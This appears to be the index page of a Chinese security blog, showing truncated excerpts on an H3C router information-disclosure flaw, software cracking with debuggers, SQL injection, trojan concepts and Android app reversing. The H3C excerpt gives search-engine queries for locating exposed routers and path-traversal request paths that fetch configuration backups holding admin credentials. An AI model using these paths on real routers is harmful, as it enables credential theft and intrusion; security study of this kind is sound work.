Aurora`Blog

描述H3C路由器多系列存在信息泄露漏洞，攻击者可以利用该漏洞获取备份文件中的管理员账户及密码等敏感信息 查询语法fofa：app=”H3C Router Management”hunter-query：app.name=”H3C Router Management” POC123456789101112131415161718192021/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg/userLogin.asp/../actionpolicy_status/../M60.cfg/userLogin.asp/../actionpolicy_status/../GR8300.cfg/userLogin.asp/../actionpolicy_status/../GR5200.cfg/userLogin.asp/../actionpolicy_status/../GR3200.cfg/userLogin.asp/../actionpolicy_status/../GR2200.cfg/userLogin.asp/../actionp ...

Web逆向

写在前面：逆向从入门到入狱 win逆向工具包：https://pan.baidu.com/s/1adD0trfqKMNx_iZpECljWA?pwd=niwd#list/path=%2F 辨析架构x32x64 数据存放位置内存—->内存条—>显卡（显存） 标题修改，汉化 PE+OD修改标题（32位）以御剑为例：将.exe加载到OD左下角，内存窗口 搜索 鼠标右键 文本 查找 二进制字符串 二进制编辑 选中 复制到可执行文件 鼠标右键 保存文件 CE（搜地址）+OD（保存文件）（32位）CE打开进程，调整数值类型为字符串，区分大小写，可写变成方块修改拿到地址值在OD中查找，左下角，右键，转到，表达式，输入，选中 复制到可执行文件 鼠标右键 保存文件 x64dbg（64位）cpu、内存布局、引用在搜索结果中测试，创可贴，补丁，修补文件，保存二进制编辑

SQL注入漏洞1.原理SQL注入是一种常见的安全漏洞，它允许攻击者通过在应用程序的输入字段中插入恶意的SQL代码来执行未经授权的数据库操作。SQL注入的原理是利用应用程序对用户输入数据的不正确处理，使得攻击者能够向数据库发送恶意的SQL查询，从而绕过应用程序的访问控制并访问、修改或删除数据库中的数据。 以下是SQL注入的一般工作原理： 用户输入数据的不正确处理：应用程序未正确过滤或转义用户输入的数据，将用户输入直接拼接到SQL查询中，而不是使用参数化查询或其他安全的方式来处理输入数据。 构造恶意的SQL查询：攻击者利用应用程序的漏洞，向输入字段中插入恶意的SQL代码。这可以是通过表单输入、URL参数、Cookie等方式注入恶意代码。 SQL查询的执行：一旦恶意SQL代码被插入到查询中，应用程序会将整个SQL查询发送到数据库服务器执行，包括攻击者注入的恶意部分。 数据库执行恶意代码：数据库服务器执行了恶意注入的SQL代码，这可能导致数据库泄露敏感数据、修改数据、删除数据，甚至完全控制数据库服务器。 攻击者获取数据或控制：通过成功的SQL注入攻击，攻击者可以获取敏感数据，如用户凭证、个人 ...

木马病毒分析基本概念木马病毒是计算机黑客用于远程控制计算机的程序，将控制程序寄生于被控制的计算机系统中，里应外合，对被感染木马病毒的计算机实施操作。一般的木马病毒程序主要是寻找计算机后门，伺机窃取被控计算机中的密码和重要文件等。可以对被控计算机实施监控、资料修改等非法操作。木马病毒具有很强的隐蔽性，可以根据黑客意图突然发起攻击 计算机木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码，是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。 原理木马病毒通常是基于计算机网络的，是基于客户端和服务端的通信、监控程序。客户端的程序用于黑客远程控制，可以发出控制命令，接收服务端传来的信息。服务端程序运行在被控计算机上，一般隐藏在被控计算机中，可以接收客户端发来的命令并执行，将客户端需要的信息发回，也就是常说的木马程序。 种类 网游木马 网银木马 下载类 代理类 FTP木马 通讯软件类 发送消息型 盗号型 传播自身型 网页点击类 特征隐蔽性、欺骗性、顽固性、危害性 传播方式木马病毒的传播方式比较多，主要有：（1）利用下载进行传播，在下载的过程中进入程序，当下载 ...

什么是逆向：https://blog.csdn.net/eastmount/article/details/107591832 app逆向环境安装Magisk安装包：https://www.123pan.com/s/6zyrVv-kxor3.html Magisk 是一套用于定制 Android 的开源软件，支持高于 Android 5.0 的设备。 以下是一些功能亮点： MagiskSU：为应用程序提供 root 访问权限 Magisk 模块：通过安装模块修改只读分区 MagiskHide：从根检测 / 系统完整性检查中隐藏 Magisk(Shamiko) MagiskBoot : 最完整的安卓启动镜像解包和重新打包工具 LSPosed安装包https://www.123pan.com/s/6zyrVv-kxor3.html 1.模拟器打开电脑共享文件夹，将LSPosed拖进去，返回Masisk点击模块2.安装模块，重启模拟器 初识APK文件结构、双开、汉化、基础修文件结构apk 全称 Android Package，它相当于一个压缩文件，只要在电脑上将apk后缀改为zip即可 ...